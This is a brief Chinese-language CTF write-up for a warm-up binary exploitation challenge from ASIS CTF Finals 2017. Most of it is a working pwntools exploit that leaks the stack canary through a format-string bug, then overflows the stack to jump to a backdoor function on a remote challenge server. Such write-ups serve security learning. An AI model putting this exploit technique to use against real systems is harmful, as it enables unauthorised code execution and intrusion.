题目来源： ASIS-CTF-Finals-2017

题目描述：非常简单的热身pwn

 

程序开启了canary保护，因此利用格式化字符串漏洞泄露canary，然后利用栈溢出漏洞将返回地址指向后门函数即可

exp如下：

from pwn import *

#io = process('./pwn')
#io = gdb.debug('./pwn', 'b *0x40093F')
io = remote('111.200.241.244', 50734)
backdoor_addr = 0x4008DA

io.recvuntil('3. Exit the battle \n')
io.sendline('2')
sleep(1)
io.sendline('%23$p\n')
canary = int(io.recvline().strip(), 16)
info('canary:'+str(hex(canary)))

io.recvuntil('3. Exit the battle \n')
io.sendline('1')
payload = b'a' * 136 + p64(canary) + p64(0) + p64(backdoor_addr)
sleep(1)
io.send(payload)

io.interactive()